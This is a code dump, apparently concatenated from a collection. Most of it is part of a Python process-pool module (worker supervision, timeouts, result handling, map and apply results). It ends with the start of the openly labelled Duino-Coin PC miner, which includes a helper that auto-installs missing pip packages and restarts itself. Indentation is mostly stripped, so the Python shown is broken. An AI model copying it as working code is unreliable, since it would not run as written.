for i, job in list(cache.items()):
ack_time = job._time_accepted
soft_timeout = job._soft_timeout
if soft_timeout is None:
soft_timeout = t_soft
hard_timeout = job._timeout
if hard_timeout is None:
hard_timeout = t_hard
if _timed_out(ack_time, hard_timeout):
on_hard_timeout(job)
elif i not in dirty and _timed_out(ack_time, soft_timeout):
on_soft_timeout(job)
dirty.add(i)
yield
def body(self):
while self._state == RUN:
try:
for _ in self.handle_timeouts():
time.sleep(1.0) # don't spin
except CoroStop:
break
debug('timeout handler exiting')
def handle_event(self, *args):
if self._it is None:
self._it = self.handle_timeouts()
try:
next(self._it)
except StopIteration:
self._it = None
class ResultHandler(PoolThread):
def __init__(self, outqueue, get, cache, poll,
join_exited_workers, putlock, restart_state,
check_timeouts, on_job_ready):
self.outqueue = outqueue
self.get = get
self.cache = cache
self.poll = poll
self.join_exited_workers = join_exited_workers
self.putlock = putlock
self.restart_state = restart_state
self._it = None
self._shutdown_complete = False
self.check_timeouts = check_timeouts
self.on_job_ready = on_job_ready
self._make_methods()
super(ResultHandler, self).__init__()
def on_stop_not_started(self):
# used when pool started without result handler thread.
self.finish_at_shutdown(handle_timeouts=True)
def _make_methods(self):
cache = self.cache
putlock = self.putlock
restart_state = self.restart_state
on_job_ready = self.on_job_ready
def on_ack(job, i, time_accepted, pid, synqW_fd):
restart_state.R = 0
try:
cache[job]._ack(i, time_accepted, pid, synqW_fd)
except (KeyError, AttributeError):
# Object gone or doesn't support _ack (e.g. IMAPIterator).
pass
def on_ready(job, i, obj, inqW_fd):
if on_job_ready is not None:
on_job_ready(job, i, obj, inqW_fd)
try:
item = cache[job]
except KeyError:
return
if not item.ready():
if putlock is not None:
putlock.release()
try:
item._set(i, obj)
except KeyError:
pass
def on_death(pid, exitcode):
try:
os.kill(pid, signal.SIGTERM)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
state_handlers = self.state_handlers = {
ACK: on_ack, READY: on_ready, DEATH: on_death
}
def on_state_change(task):
state, args = task
try:
state_handlers[state](*args)
except KeyError:
debug("Unknown job state: %s (args=%s)", state, args)
self.on_state_change = on_state_change
def _process_result(self, timeout=1.0):
poll = self.poll
on_state_change = self.on_state_change
while 1:
try:
ready, task = poll(timeout)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
raise CoroStop()
if self._state:
assert self._state == TERMINATE
debug('result handler found thread._state=TERMINATE')
raise CoroStop()
if ready:
if task is None:
debug('result handler got sentinel')
raise CoroStop()
on_state_change(task)
if timeout != 0: # blocking
break
else:
break
yield
def handle_event(self, fileno=None, events=None):
if self._state == RUN:
if self._it is None:
self._it = self._process_result(0) # non-blocking
try:
next(self._it)
except (StopIteration, CoroStop):
self._it = None
def body(self):
debug('result handler starting')
try:
while self._state == RUN:
try:
for _ in self._process_result(1.0): # blocking
pass
except CoroStop:
break
finally:
self.finish_at_shutdown()
def finish_at_shutdown(self, handle_timeouts=False):
self._shutdown_complete = True
get = self.get
outqueue = self.outqueue
cache = self.cache
poll = self.poll
join_exited_workers = self.join_exited_workers
check_timeouts = self.check_timeouts
on_state_change = self.on_state_change
time_terminate = None
while cache and self._state != TERMINATE:
if check_timeouts is not None:
check_timeouts()
try:
ready, task = poll(1.0)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
return
if ready:
if task is None:
debug('result handler ignoring extra sentinel')
continue
on_state_change(task)
try:
join_exited_workers(shutdown=True)
except WorkersJoined:
now = monotonic()
if not time_terminate:
time_terminate = now
else:
if now - time_terminate > 5.0:
debug('result handler exiting: timed out')
break
debug('result handler: all workers terminated, '
'timeout in %ss',
abs(min(now - time_terminate - 5.0, 0)))
if hasattr(outqueue, '_reader'):
debug('ensuring that outqueue is not full')
# If we don't make room available in outqueue then
# attempts to add the sentinel (None) to outqueue may
# block. There is guaranteed to be no more than 2 sentinels.
try:
for i in range(10):
if not outqueue._reader.poll():
break
get()
except (IOError, EOFError):
pass
debug('result handler exiting: len(cache)=%s, thread._state=%s',
len(cache), self._state)
class Pool(object):
'''
Class which supports an async version of applying functions to arguments.
'''
_wrap_exception = True
Worker = Worker
Supervisor = Supervisor
TaskHandler = TaskHandler
TimeoutHandler = TimeoutHandler
ResultHandler = ResultHandler
SoftTimeLimitExceeded = SoftTimeLimitExceeded
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, timeout=None, soft_timeout=None,
lost_worker_timeout=None,
max_restarts=None, max_restart_freq=1,
on_process_up=None,
on_process_down=None,
on_timeout_set=None,
on_timeout_cancel=None,
threads=True,
semaphore=None,
putlocks=False,
allow_restart=False,
synack=False,
on_process_exit=None,
context=None,
**kwargs):
self._ctx = context or get_context()
self.synack = synack
self._setup_queues()
self._taskqueue = Queue()
self._cache = {}
self._state = RUN
self.timeout = timeout
self.soft_timeout = soft_timeout
self._maxtasksperchild = maxtasksperchild
self._initializer = initializer
self._initargs = initargs
self._on_process_exit = on_process_exit
self.lost_worker_timeout = lost_worker_timeout or LOST_WORKER_TIMEOUT
self.on_process_up = on_process_up
self.on_process_down = on_process_down
self.on_timeout_set = on_timeout_set
self.on_timeout_cancel = on_timeout_cancel
self.threads = threads
self.readers = {}
self.allow_restart = allow_restart
if soft_timeout and SIG_SOFT_TIMEOUT is None:
warnings.warn(UserWarning(
"Soft timeouts are not supported: "
"on this platform: It does not have the SIGUSR1 signal.",
))
soft_timeout = None
self._processes = self.cpu_count() if processes is None else processes
self.max_restarts = max_restarts or round(self._processes * 100)
self.restart_state = restart_state(max_restarts, max_restart_freq or 1)
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
if on_process_exit is not None and not callable(on_process_exit):
raise TypeError('on_process_exit must be callable')
self._pool = []
self._poolctrl = {}
self.putlocks = putlocks
self._putlock = semaphore or LaxBoundedSemaphore(self._processes)
for i in range(self._processes):
self._create_worker_process(i)
self._worker_handler = self.Supervisor(self)
if threads:
self._worker_handler.start()
self._task_handler = self.TaskHandler(self._taskqueue,
self._quick_put,
self._outqueue,
self._pool)
if threads:
self._task_handler.start()
# Thread killing timedout jobs.
self._timeout_handler = self.TimeoutHandler(
self._pool, self._cache,
self.soft_timeout, self.timeout,
)
self._timeout_handler_mutex = Lock()
self._timeout_handler_started = False
if self.timeout is not None or self.soft_timeout is not None:
self._start_timeout_handler()
# If running without threads, we need to check for timeouts
# while waiting for unfinished work at shutdown.
self.check_timeouts = None
if not threads:
self.check_timeouts = self._timeout_handler.handle_event
# Thread processing results in the outqueue.
self._result_handler = self.create_result_handler()
self.handle_result_event = self._result_handler.handle_event
if threads:
self._result_handler.start()
self._terminate = Finalize(
self, self._terminate_pool,
args=(self._taskqueue, self._inqueue, self._outqueue,
self._pool, self._worker_handler, self._task_handler,
self._result_handler, self._cache,
self._timeout_handler,
self._help_stuff_finish_args()),
exitpriority=15,
)
def Process(self, *args, **kwds):
return self._ctx.Process(*args, **kwds)
def WorkerProcess(self, worker):
return worker.contribute_to_object(self.Process(target=worker))
def create_result_handler(self, **extra_kwargs):
return self.ResultHandler(
self._outqueue, self._quick_get, self._cache,
self._poll_result, self._join_exited_workers,
self._putlock, self.restart_state, self.check_timeouts,
self.on_job_ready, **extra_kwargs
)
def on_job_ready(self, job, i, obj, inqW_fd):
pass
def _help_stuff_finish_args(self):
return self._inqueue, self._task_handler, self._pool
def cpu_count(self):
try:
return cpu_count()
except NotImplementedError:
return 1
def handle_result_event(self, *args):
return self._result_handler.handle_event(*args)
def _process_register_queues(self, worker, queues):
pass
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self._pool)
if proc.pid == pid
), (None, None))
def get_process_queues(self):
return self._inqueue, self._outqueue, None
def _create_worker_process(self, i):
sentinel = self._ctx.Event() if self.allow_restart else None
inq, outq, synq = self.get_process_queues()
w = self.WorkerProcess(self.Worker(
inq, outq, synq, self._initializer, self._initargs,
self._maxtasksperchild, sentinel, self._on_process_exit,
# Need to handle all signals if using the ipc semaphore,
# to make sure the semaphore is released.
sigprotection=self.threads,
wrap_exception=self._wrap_exception,
))
self._pool.append(w)
self._process_register_queues(w, (inq, outq, synq))
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.index = i
w.start()
self._poolctrl[w.pid] = sentinel
if self.on_process_up:
self.on_process_up(w)
return w
def process_flush_queues(self, worker):
pass
def _join_exited_workers(self, shutdown=False):
"""Cleanup after any worker processes which have exited due to
        reaching their specified lifetime. Returns a list of exit codes for
        the workers that were cleaned up (empty if none exited).
"""
now = None
# The worker may have published a result before being terminated,
# but we have no way to accurately tell if it did. So we wait for
# _lost_worker_timeout seconds before we mark the job with
# WorkerLostError.
for job in [job for job in list(self._cache.values())
if not job.ready() and job._worker_lost]:
now = now or monotonic()
lost_time, lost_ret = job._worker_lost
if now - lost_time > job._lost_worker_timeout:
self.mark_as_worker_lost(job, lost_ret)
if shutdown and not len(self._pool):
raise WorkersJoined()
cleaned, exitcodes = {}, {}
for i in reversed(range(len(self._pool))):
worker = self._pool[i]
exitcode = worker.exitcode
popen = worker._popen
if popen is None or exitcode is not None:
# worker exited
debug('Supervisor: cleaning up worker %d', i)
if popen is not None:
worker.join()
                debug('Supervisor: worker %d joined', i)
cleaned[worker.pid] = worker
exitcodes[worker.pid] = exitcode
if exitcode not in (EX_OK, EX_RECYCLE) and \
not getattr(worker, '_controlled_termination', False):
error(
'Process %r pid:%r exited with %r',
worker.name, worker.pid, human_status(exitcode),
exc_info=0,
)
self.process_flush_queues(worker)
del self._pool[i]
del self._poolctrl[worker.pid]
if cleaned:
all_pids = [w.pid for w in self._pool]
for job in list(self._cache.values()):
acked_by_gone = next(
(pid for pid in job.worker_pids()
if pid in cleaned or pid not in all_pids),
None
)
# already accepted by process
if acked_by_gone:
self.on_job_process_down(job, acked_by_gone)
if not job.ready():
exitcode = exitcodes.get(acked_by_gone) or 0
proc = cleaned.get(acked_by_gone)
if proc and getattr(proc, '_job_terminated', False):
job._set_terminated(exitcode)
else:
self.on_job_process_lost(
job, acked_by_gone, exitcode,
)
else:
# started writing to
write_to = job._write_to
# was scheduled to write to
sched_for = job._scheduled_for
if write_to and not write_to._is_alive():
self.on_job_process_down(job, write_to.pid)
elif sched_for and not sched_for._is_alive():
self.on_job_process_down(job, sched_for.pid)
for worker in values(cleaned):
if self.on_process_down:
if not shutdown:
self._process_cleanup_queues(worker)
self.on_process_down(worker)
return list(exitcodes.values())
return []
def on_partial_read(self, job, worker):
pass
def _process_cleanup_queues(self, worker):
pass
def on_job_process_down(self, job, pid_gone):
pass
def on_job_process_lost(self, job, pid, exitcode):
job._worker_lost = (monotonic(), exitcode)
def mark_as_worker_lost(self, job, exitcode):
try:
raise WorkerLostError(
'Worker exited prematurely: {0}.'.format(
human_status(exitcode)),
)
except WorkerLostError:
job._set(None, (False, ExceptionInfo()))
else: # pragma: no cover
pass
def __enter__(self):
return self
def __exit__(self, *exc_info):
return self.terminate()
def on_grow(self, n):
pass
def on_shrink(self, n):
pass
def shrink(self, n=1):
for i, worker in enumerate(self._iterinactive()):
self._processes -= 1
if self._putlock:
self._putlock.shrink()
worker.terminate_controlled()
self.on_shrink(1)
if i >= n - 1:
break
else:
raise ValueError("Can't shrink pool. All processes busy!")
def grow(self, n=1):
for i in range(n):
self._processes += 1
if self._putlock:
self._putlock.grow()
self.on_grow(n)
def _iterinactive(self):
for worker in self._pool:
if not self._worker_active(worker):
yield worker
def _worker_active(self, worker):
for job in values(self._cache):
if worker.pid in job.worker_pids():
return True
return False
def _repopulate_pool(self, exitcodes):
"""Bring the number of pool processes up to the specified number,
for use after reaping workers which have exited.
"""
for i in range(self._processes - len(self._pool)):
if self._state != RUN:
return
try:
if exitcodes and exitcodes[i] not in (EX_OK, EX_RECYCLE):
self.restart_state.step()
except IndexError:
self.restart_state.step()
self._create_worker_process(self._avail_index())
debug('added worker')
def _avail_index(self):
assert len(self._pool) < self._processes
indices = set(p.index for p in self._pool)
return next(i for i in range(self._processes) if i not in indices)
def did_start_ok(self):
return not self._join_exited_workers()
def _maintain_pool(self):
""""Clean up any exited workers and start replacements for them.
"""
joined = self._join_exited_workers()
self._repopulate_pool(joined)
for i in range(len(joined)):
if self._putlock is not None:
self._putlock.release()
def maintain_pool(self):
if self._worker_handler._state == RUN and self._state == RUN:
try:
self._maintain_pool()
except RestartFreqExceeded:
self.close()
self.join()
raise
except OSError as exc:
if get_errno(exc) == errno.ENOMEM:
reraise(MemoryError,
MemoryError(str(exc)),
sys.exc_info()[2])
raise
def _setup_queues(self):
self._inqueue = self._ctx.SimpleQueue()
self._outqueue = self._ctx.SimpleQueue()
self._quick_put = self._inqueue._writer.send
self._quick_get = self._outqueue._reader.recv
def _poll_result(timeout):
if self._outqueue._reader.poll(timeout):
return True, self._quick_get()
return False, None
self._poll_result = _poll_result
def _start_timeout_handler(self):
# ensure more than one thread does not start the timeout handler
# thread at once.
if self.threads:
with self._timeout_handler_mutex:
if not self._timeout_handler_started:
self._timeout_handler_started = True
self._timeout_handler.start()
def apply(self, func, args=(), kwds={}):
'''
        Equivalent of `func(*args, **kwds)`.
'''
if self._state == RUN:
return self.apply_async(func, args, kwds).get()
def starmap(self, func, iterable, chunksize=None):
'''
Like `map()` method but the elements of the `iterable` are expected to
be iterables as well and will be unpacked as arguments. Hence
`func` and (a, b) becomes func(a, b).
'''
if self._state == RUN:
return self._map_async(func, iterable,
starmapstar, chunksize).get()
def starmap_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous version of `starmap()` method.
'''
if self._state == RUN:
return self._map_async(func, iterable, starmapstar, chunksize,
callback, error_callback)
def map(self, func, iterable, chunksize=None):
'''
Apply `func` to each element in `iterable`, collecting the results
in a list that is returned.
'''
if self._state == RUN:
return self.map_async(func, iterable, chunksize).get()
def imap(self, func, iterable, chunksize=1, lost_worker_timeout=None):
'''
Equivalent of `map()` -- can be MUCH slower than `Pool.map()`.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def imap_unordered(self, func, iterable, chunksize=1,
lost_worker_timeout=None):
'''
Like `imap()` method but ordering of results is arbitrary.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def apply_async(self, func, args=(), kwds={},
callback=None, error_callback=None, accept_callback=None,
timeout_callback=None, waitforslot=None,
soft_timeout=None, timeout=None, lost_worker_timeout=None,
callbacks_propagate=(),
correlation_id=None):
'''
Asynchronous equivalent of `apply()` method.
        Callback is called when the function's return value is ready.
The accept callback is called when the job is accepted to be executed.
Simplified the flow is like this:
>>> def apply_async(func, args, kwds, callback, accept_callback):
... if accept_callback:
... accept_callback()
... retval = func(*args, **kwds)
... if callback:
... callback(retval)
'''
if self._state != RUN:
return
soft_timeout = soft_timeout or self.soft_timeout
timeout = timeout or self.timeout
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if soft_timeout and SIG_SOFT_TIMEOUT is None:
warnings.warn(UserWarning(
"Soft timeouts are not supported: "
"on this platform: It does not have the SIGUSR1 signal.",
))
soft_timeout = None
if self._state == RUN:
waitforslot = self.putlocks if waitforslot is None else waitforslot
if waitforslot and self._putlock is not None:
self._putlock.acquire()
result = ApplyResult(
self._cache, callback, accept_callback, timeout_callback,
error_callback, soft_timeout, timeout, lost_worker_timeout,
on_timeout_set=self.on_timeout_set,
on_timeout_cancel=self.on_timeout_cancel,
callbacks_propagate=callbacks_propagate,
send_ack=self.send_ack if self.synack else None,
correlation_id=correlation_id,
)
if timeout or soft_timeout:
# start the timeout handler thread when required.
self._start_timeout_handler()
if self.threads:
self._taskqueue.put(([(TASK, (result._job, None,
func, args, kwds))], None))
else:
self._quick_put((TASK, (result._job, None, func, args, kwds)))
return result
def send_ack(self, response, job, i, fd):
pass
def terminate_job(self, pid, sig=None):
proc, _ = self._process_by_pid(pid)
if proc is not None:
try:
_kill(pid, sig or signal.SIGTERM)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
else:
proc._controlled_termination = True
proc._job_terminated = True
def map_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous equivalent of `map()` method.
'''
return self._map_async(
func, iterable, mapstar, chunksize, callback, error_callback,
)
def _map_async(self, func, iterable, mapper, chunksize=None,
callback=None, error_callback=None):
'''
Helper function to implement map, starmap and their async counterparts.
'''
if self._state != RUN:
return
if not hasattr(iterable, '__len__'):
iterable = list(iterable)
if chunksize is None:
chunksize, extra = divmod(len(iterable), len(self._pool) * 4)
if extra:
chunksize += 1
if len(iterable) == 0:
chunksize = 0
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = MapResult(self._cache, chunksize, len(iterable), callback,
error_callback=error_callback)
self._taskqueue.put((((TASK, (result._job, i, mapper, (x,), {}))
for i, x in enumerate(task_batches)), None))
return result
@staticmethod
def _get_tasks(func, it, size):
it = iter(it)
while 1:
x = tuple(itertools.islice(it, size))
if not x:
return
yield (func, x)
def __reduce__(self):
raise NotImplementedError(
'pool objects cannot be passed between processes or pickled',
)
def close(self):
debug('closing pool')
if self._state == RUN:
self._state = CLOSE
if self._putlock:
self._putlock.clear()
self._worker_handler.close()
self._taskqueue.put(None)
stop_if_not_current(self._worker_handler)
def terminate(self):
debug('terminating pool')
self._state = TERMINATE
self._worker_handler.terminate()
self._terminate()
@staticmethod
def _stop_task_handler(task_handler):
stop_if_not_current(task_handler)
def join(self):
assert self._state in (CLOSE, TERMINATE)
debug('joining worker handler')
stop_if_not_current(self._worker_handler)
debug('joining task handler')
self._stop_task_handler(self._task_handler)
debug('joining result handler')
stop_if_not_current(self._result_handler)
debug('result handler joined')
for i, p in enumerate(self._pool):
debug('joining worker %s/%s (%r)', i+1, len(self._pool), p)
if p._popen is not None: # process started?
p.join()
debug('pool join complete')
def restart(self):
for e in values(self._poolctrl):
e.set()
@staticmethod
def _help_stuff_finish(inqueue, task_handler, _pool):
# task_handler may be blocked trying to put items on inqueue
debug('removing tasks from inqueue until task handler finished')
inqueue._rlock.acquire()
while task_handler.is_alive() and inqueue._reader.poll():
inqueue._reader.recv()
time.sleep(0)
@classmethod
def _set_result_sentinel(cls, outqueue, pool):
outqueue.put(None)
@classmethod
def _terminate_pool(cls, taskqueue, inqueue, outqueue, pool,
worker_handler, task_handler,
result_handler, cache, timeout_handler,
help_stuff_finish_args):
# this is guaranteed to only be called once
debug('finalizing pool')
worker_handler.terminate()
task_handler.terminate()
taskqueue.put(None) # sentinel
debug('helping task handler/workers to finish')
cls._help_stuff_finish(*help_stuff_finish_args)
result_handler.terminate()
cls._set_result_sentinel(outqueue, pool)
if timeout_handler is not None:
timeout_handler.terminate()
# Terminate workers which haven't already finished
if pool and hasattr(pool[0], 'terminate'):
debug('terminating workers')
for p in pool:
if p._is_alive():
p.terminate()
debug('joining task handler')
cls._stop_task_handler(task_handler)
debug('joining result handler')
result_handler.stop()
if timeout_handler is not None:
debug('joining timeout handler')
timeout_handler.stop(TIMEOUT_MAX)
if pool and hasattr(pool[0], 'terminate'):
debug('joining pool workers')
for p in pool:
if p.is_alive():
# worker has not yet exited
debug('cleaning up worker %d', p.pid)
if p._popen is not None:
p.join()
debug('pool workers joined')
@property
def process_sentinels(self):
return [w._popen.sentinel for w in self._pool]
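# Usage sketch: a hypothetical, high-level use of the Pool defined above. The
# worker function and pool size are placeholders; apply_async() returns an
# ApplyResult (see below) whose get() blocks until a worker publishes the value.
def _example_square(x):
    return x * x
def _example_pool_usage():
    pool = Pool(processes=2)
    try:
        async_result = pool.apply_async(_example_square, (7,))
        squares = pool.map(_example_square, range(5))   # -> [0, 1, 4, 9, 16]
        return async_result.get(timeout=10), squares
    finally:
        pool.close()
        pool.join()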
#
# Class whose instances are returned by `Pool.apply_async()`
#
class ApplyResult(object):
_worker_lost = None
_write_to = None
_scheduled_for = None
def __init__(self, cache, callback, accept_callback=None,
timeout_callback=None, error_callback=None, soft_timeout=None,
timeout=None, lost_worker_timeout=LOST_WORKER_TIMEOUT,
on_timeout_set=None, on_timeout_cancel=None,
callbacks_propagate=(), send_ack=None,
correlation_id=None):
self.correlation_id = correlation_id
self._mutex = Lock()
self._event = threading.Event()
self._job = next(job_counter)
self._cache = cache
self._callback = callback
self._accept_callback = accept_callback
self._error_callback = error_callback
self._timeout_callback = timeout_callback
self._timeout = timeout
self._soft_timeout = soft_timeout
self._lost_worker_timeout = lost_worker_timeout
self._on_timeout_set = on_timeout_set
self._on_timeout_cancel = on_timeout_cancel
self._callbacks_propagate = callbacks_propagate or ()
self._send_ack = send_ack
self._accepted = False
self._cancelled = False
self._worker_pid = None
self._time_accepted = None
self._terminated = None
cache[self._job] = self
def __repr__(self):
return '<Result: {id} ack:{ack} ready:{ready}>'.format(
id=self._job, ack=self._accepted, ready=self.ready(),
)
def ready(self):
return self._event.isSet()
def accepted(self):
return self._accepted
def successful(self):
assert self.ready()
return self._success
def _cancel(self):
"""Only works if synack is used."""
self._cancelled = True
def discard(self):
self._cache.pop(self._job, None)
def terminate(self, signum):
self._terminated = signum
def _set_terminated(self, signum=None):
try:
raise Terminated(-(signum or 0))
except Terminated:
self._set(None, (False, ExceptionInfo()))
def worker_pids(self):
return [self._worker_pid] if self._worker_pid else []
def wait(self, timeout=None):
self._event.wait(timeout)
def get(self, timeout=None):
self.wait(timeout)
if not self.ready():
raise TimeoutError
if self._success:
return self._value
else:
raise self._value.exception
def safe_apply_callback(self, fun, *args, **kwargs):
if fun:
try:
fun(*args, **kwargs)
except self._callbacks_propagate:
raise
except Exception as exc:
error('Pool callback raised exception: %r', exc,
exc_info=1)
def handle_timeout(self, soft=False):
if self._timeout_callback is not None:
self.safe_apply_callback(
self._timeout_callback, soft=soft,
timeout=self._soft_timeout if soft else self._timeout,
)
def _set(self, i, obj):
with self._mutex:
if self._on_timeout_cancel:
self._on_timeout_cancel(self)
self._success, self._value = obj
self._event.set()
if self._accepted:
# if not accepted yet, then the set message
# was received before the ack, which means
# the ack will remove the entry.
self._cache.pop(self._job, None)
# apply callbacks last
if self._callback and self._success:
self.safe_apply_callback(
self._callback, self._value)
if (self._value is not None and
self._error_callback and not self._success):
self.safe_apply_callback(
self._error_callback, self._value)
def _ack(self, i, time_accepted, pid, synqW_fd):
with self._mutex:
if self._cancelled and self._send_ack:
self._accepted = True
if synqW_fd:
return self._send_ack(NACK, pid, self._job, synqW_fd)
return
self._accepted = True
self._time_accepted = time_accepted
self._worker_pid = pid
if self.ready():
# ack received after set()
self._cache.pop(self._job, None)
if self._on_timeout_set:
self._on_timeout_set(self, self._soft_timeout, self._timeout)
response = ACK
if self._accept_callback:
try:
self._accept_callback(pid, time_accepted)
                except self._callbacks_propagate:
response = NACK
raise
except Exception:
response = NACK
# ignore other errors
finally:
if self._send_ack and synqW_fd:
return self._send_ack(
response, pid, self._job, synqW_fd
)
if self._send_ack and synqW_fd:
self._send_ack(response, pid, self._job, synqW_fd)
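# Minimal usage sketch: ApplyResult instances are normally obtained from
# Pool.apply_async() rather than constructed directly. This assumes billiard
# exposes Pool at the package top level, mirroring multiprocessing:
#
#     from billiard import Pool
#     pool = Pool(2)
#     res = pool.apply_async(pow, (2, 10))   # returns an ApplyResult
#     print(res.get(timeout=5))              # -> 1024
#     pool.close()
#     pool.join()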
#
# Class whose instances are returned by `Pool.map_async()`
#
class MapResult(ApplyResult):
def __init__(self, cache, chunksize, length, callback, error_callback):
ApplyResult.__init__(
self, cache, callback, error_callback=error_callback,
)
self._success = True
self._length = length
self._value = [None] * length
self._accepted = [False] * length
self._worker_pid = [None] * length
self._time_accepted = [None] * length
self._chunksize = chunksize
if chunksize <= 0:
self._number_left = 0
self._event.set()
del cache[self._job]
else:
self._number_left = length // chunksize + bool(length % chunksize)
def _set(self, i, success_result):
success, result = success_result
if success:
self._value[i * self._chunksize:(i + 1) * self._chunksize] = result
self._number_left -= 1
if self._number_left == 0:
if self._callback:
self._callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
else:
self._success = False
self._value = result
if self._error_callback:
self._error_callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
def _ack(self, i, time_accepted, pid, *args):
start = i * self._chunksize
stop = min((i + 1) * self._chunksize, self._length)
for j in range(start, stop):
self._accepted[j] = True
self._worker_pid[j] = pid
self._time_accepted[j] = time_accepted
if self.ready():
self._cache.pop(self._job, None)
def accepted(self):
return all(self._accepted)
def worker_pids(self):
return [pid for pid in self._worker_pid if pid]
#
# Class whose instances are returned by `Pool.imap()`
#
class IMapIterator(object):
_worker_lost = None
def __init__(self, cache, lost_worker_timeout=LOST_WORKER_TIMEOUT):
self._cond = threading.Condition(threading.Lock())
self._job = next(job_counter)
self._cache = cache
self._items = deque()
self._index = 0
self._length = None
self._ready = False
self._unsorted = {}
self._worker_pids = []
self._lost_worker_timeout = lost_worker_timeout
cache[self._job] = self
def __iter__(self):
return self
def next(self, timeout=None):
with self._cond:
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
self._cond.wait(timeout)
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
raise TimeoutError
success, value = item
if success:
return value
raise Exception(value)
__next__ = next # XXX
def _set(self, i, obj):
with self._cond:
if self._index == i:
self._items.append(obj)
self._index += 1
while self._index in self._unsorted:
obj = self._unsorted.pop(self._index)
self._items.append(obj)
self._index += 1
self._cond.notify()
else:
self._unsorted[i] = obj
if self._index == self._length:
self._ready = True
del self._cache[self._job]
def _set_length(self, length):
with self._cond:
self._length = length
if self._index == self._length:
self._ready = True
self._cond.notify()
del self._cache[self._job]
def _ack(self, i, time_accepted, pid, *args):
self._worker_pids.append(pid)
def ready(self):
return self._ready
def worker_pids(self):
return self._worker_pids
#
# Class whose instances are returned by `Pool.imap_unordered()`
#
class IMapUnorderedIterator(IMapIterator):
def _set(self, i, obj):
with self._cond:
self._items.append(obj)
self._index += 1
self._cond.notify()
if self._index == self._length:
self._ready = True
del self._cache[self._job]
#
#
#
class ThreadPool(Pool):
from billiard.dummy import Process as DummyProcess
Process = DummyProcess
def __init__(self, processes=None, initializer=None, initargs=()):
Pool.__init__(self, processes, initializer, initargs)
def _setup_queues(self):
self._inqueue = Queue()
self._outqueue = Queue()
self._quick_put = self._inqueue.put
self._quick_get = self._outqueue.get
def _poll_result(timeout):
try:
return True, self._quick_get(timeout=timeout)
except Empty:
return False, None
self._poll_result = _poll_result
@staticmethod
def _help_stuff_finish(inqueue, task_handler, pool):
# put sentinels at head of inqueue to make workers finish
with inqueue.not_empty:
inqueue.queue.clear()
inqueue.queue.extend([None] * len(pool))
inqueue.not_empty.notify_all()
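# Minimal usage sketch (illustrative only): ThreadPool exposes the same
# interface as Pool but runs tasks in threads, which suits I/O-bound work:
#
#     tp = ThreadPool(2)
#     print(tp.map(len, ["a", "bb", "ccc"]))   # -> [1, 2, 3]
#     tp.close()
#     tp.join()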
|
PC_Miner.py
|
#!/usr/bin/env python3
"""
Duino-Coin Official PC Miner 2.7.3 © MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duino-coin
Duino-Coin Team & Community 2019-2021
"""
from time import time, sleep, strptime, ctime
from hashlib import sha1
from socket import socket
from multiprocessing import Lock as thread_lock
from multiprocessing import cpu_count, current_process
from multiprocessing import Process, Manager
from threading import Thread
from datetime import datetime
from random import randint
from os import execl, mkdir, _exit
from subprocess import DEVNULL, Popen, check_call
import pip
import sys
import os
import json
import requests
from pathlib import Path
from re import sub
from random import choice
from platform import machine as osprocessor
from signal import SIGINT, signal
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from configparser import ConfigParser
configparser = ConfigParser()
def handler(signal_received, frame):
"""
Nicely handle CTRL+C exit
"""
if current_process().name == "MainProcess":
pretty_print(
get_string("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ get_string("goodbye"),
"warning")
_exit(0)
def install(package):
"""
Automatically installs python pip package and restarts the program
"""
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
execl(sys.executable, sys.executable, *sys.argv)
try:
from xxhash import xxh64
xxhash_en = True
except ModuleNotFoundError:
print("Xxhash is not installed - this mining algorithm will be disabled")
xxhash_en = False
try:
from colorama import Back, Fore, Style, init
init(autoreset=True)
except ModuleNotFoundError:
print("Colorama is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install colorama")
install("colorama")
try:
import cpuinfo
except ModuleNotFoundError:
print("Cpuinfo is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install py-cpuinfo")
install("py-cpuinfo")
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed. "
